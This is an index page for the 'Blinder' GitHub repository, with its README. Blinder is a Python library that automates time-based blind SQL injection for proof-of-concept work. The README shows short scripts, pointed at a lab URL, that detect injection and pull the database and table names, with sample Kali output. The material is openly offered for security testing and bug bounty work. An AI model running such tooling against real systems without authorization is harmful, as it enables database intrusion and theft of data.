Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mhaskar/Blinder
A python library to automate time-based blind SQL injection
Last synced: 5 days ago
- Host: GitHub
- URL: https://github.com/mhaskar/Blinder
- Owner: mhaskar
- License: gpl-3.0
- Created: 2019-06-04T00:23:28.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-09-15T07:42:53.000Z (about 5 years ago)
- Last Synced: 2024-08-09T03:52:52.528Z (3 months ago)
- Language: Python
- Size: 27.3 KB
- Stars: 49
- Watchers: 5
- Forks: 17
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-bugbounty-tools - Blinder - A python library to automate time-based blind SQL injection (Exploitation / SQL Injection)
README
# Blinder
Blinder is a small Python library that automates time-based blind SQL injection by providing predefined queries as functions, for rapid PoC development.
# Installation
You can install Blinder using the following command:
`pip install blinder`
Or by downloading the source and importing it manually to your project.
# Usage
To use Blinder, import the `Blinder` module and then call its main functions.
With the current version, you can use Blinder to do the following:
* Check for time-based injection.
* Get the database name.
* Get table names.

**You can check for injection in a URL using the following code:**
```
#!/usr/bin/python
import Blinder

# Point Blinder at the URL and parameter to test
blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)
# Prints True if time-based injection is detected
print(blind.check_injection())
```
The execution result will be:
```
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
```
**You can get the database name using the following code:**
```
#!/usr/bin/python
import Blinder

# Point Blinder at the URL and parameter to test
blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)
# Retrieve and print the current database name
print("Database name is : %s " % blind.get_database())
```
And the results will be:
```
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
```
**To get table names, you can use the following code:**
```
#!/usr/bin/python
import Blinder

# Point Blinder at the URL and parameter to test
blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)
# Retrieve the table names and print one per line
tables = blind.get_tables()
for table in tables:
    print(table)
```
And the results will be:
```
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
```
# TODO
A lot of features should be added soon, such as:
* [ ] The ability to add customized queries
* [ ] Testing injection points based on a Burp request
* [ ] Extracting table/column data